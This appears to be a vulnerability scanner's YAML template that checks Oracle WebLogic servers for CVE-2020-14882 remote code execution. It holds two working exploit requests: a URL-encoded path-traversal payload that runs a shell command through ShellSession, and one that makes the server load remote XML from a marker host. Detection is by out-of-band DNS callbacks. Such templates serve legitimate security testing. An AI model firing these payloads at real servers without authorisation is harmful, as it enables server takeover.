-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathCVE-2020-14882_WebLogic_RCE.yaml
24 lines (21 loc) · 1.23 KB
/
CVE-2020-14882_WebLogic_RCE.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
send:
- method: 'GET'
url: "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec('getent%20hosts%20DNS_MARKER');%22);"
- method: 'GET'
url: '/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://DNS_MARKER/test.xml");'
detect:
- oob:
- dns
meta-info:
- type: rce
- threat: 98
- title: "Remote code execution in Oracle WebLogic Server (CVE-2020-14882)"
- description: "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server."
- additional: "For more information, see https://www.oracle.com/security-alerts/cpuoct2020.html"
- applicable_for:
- fast
- scanner
- tags:
- RCE
- CVE-2020-14882
- Oracle WebLogic